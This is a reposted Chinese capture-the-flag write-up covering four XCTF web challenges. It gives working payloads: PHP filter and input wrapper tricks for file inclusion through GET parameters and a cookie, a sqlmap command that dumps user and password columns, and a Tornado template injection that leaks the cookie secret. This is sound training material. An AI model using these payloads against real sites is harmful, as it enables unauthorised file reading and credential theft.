文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

攻防世界--fileclude && fileinclude && inget && easytornado

2023-10-03 20:14

关注

一、fileclude

include("flag.php");highlight_file(__FILE__);if(isset($_GET["file1"]) && isset($_GET["file2"])){    $file1 = $_GET["file1"];    $file2 = $_GET["file2"];    if(!empty($file1) && !empty($file2))    {        if(file_get_contents($file2) === "hello ctf")        {            include($file1);        }    }    else        die("NONONO");} 

两个参数file1和file2
file2中包含数据file_get_contents
直接访问flag.php只显示WRONG WAY!
说明flag应该在flag.php的注释里
包含的是file1
所以

?file1=php://filter/read=convert.base64-encode/resource=flag.php

file2使用php伪协议传数据

file2=php://input

最后
http://61.147.171.105:61741/?file1=php://filter/read=convert.base64-encode/resource=flag.php&file2=php://input

然后POST数据
hello ctf
在这里插入图片描述
拿到flag
在这里插入图片描述

然后base64转码即可

二、fileinclude

注释
在这里插入图片描述
在这里插入图片描述
发现源码泄露

?phpif( !ini_get('display_errors') ) {  ini_set('display_errors', 'On');  }error_reporting(E_ALL);$lan = $_COOKIE['language'];if(!$lan){@setcookie("language","english");@include("english.php");}else{@include($lan.".php");}$x=file_get_contents('index.php');echo $x;?

发现文件包含点在COOKIE中,使用php伪协议filter的读,base64编码

COOKIE:language=php://filter/read=convert.base64-encode/resource=flag

在这里插入图片描述
base转码
在这里插入图片描述

三、inget

在这里插入图片描述
SQL注入
在这里插入图片描述
在这里插入图片描述

sqlmap -u "http://61.147.171.105:54122/?id=1" -T cyber -C user,ID,pw --dump

在这里插入图片描述

四、easytornado

模板注入
在这里插入图片描述

http://61.147.171.105:57847/error?msg={{handler.settings}}

在这里插入图片描述
先把flag的filename进行md5,然后再把cookie_secret与md5后的值拼接,再md5
在这里插入图片描述
欢迎加入我的知识星球,内含有多篇赏金漏洞
某211硕在读,三分之一的白帽子,三分之一的科研er,这里适合想要学习安全的小白师傅,适合致力于挖掘漏洞的师傅,适合安全研究人员师傅,以及想要做安全科研的师傅,想要了解网络空间安全研究生生活的师傅
在这里插入图片描述

来源地址:https://blog.csdn.net/xulei1132562/article/details/126533422

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯